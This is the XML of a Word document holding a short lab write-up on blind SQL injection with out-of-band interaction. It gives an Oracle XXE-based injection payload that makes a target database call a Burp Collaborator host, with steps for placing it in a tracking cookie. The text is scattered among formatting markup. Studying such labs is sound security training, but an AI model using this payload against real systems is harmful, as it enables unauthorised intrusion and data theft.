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13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Blind SQL injection with out-of-band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out-of-band SQL injection using Burp Collaborator DNS exfiltration.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burp collabater :-9u40fmgpg5u2e7rj0kdc5mgjjap1ds1h.oastify.com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'||(SELECT extractvalue(xmltype('&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="E74C3C" w:sz="12"/>
        </w:pBd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E74C3C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE root [&lt;!ENTITY % remote SYSTEM "http://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9u40fmgpg5u2e7rj0kdc5mgjjap1ds1h.oastify.com/"&gt; %remote;]&gt;'),'/l') FROM dual)--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Capture The Request From The Https History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Generate The Collab Id And Adter Modify The The Request Poll The Request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Send The Request Modify The Cookie Tracking With Collabarator And Encoded Url CTL+U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Blind SQL injection with out-of-band interaction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eae8ebcefd1c7795fc366f3b764a5348a0c095.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/8f85083393bad0ad9187709519871c7bc9e97160.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/4a174fc9e0f33f19820b7887b56a9d9127709731.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/9db84946f4aef5e01faec0cb7a45d68dc7d0eb9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2026-05-24T12:08:39.908Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-24T12:08:39.908Z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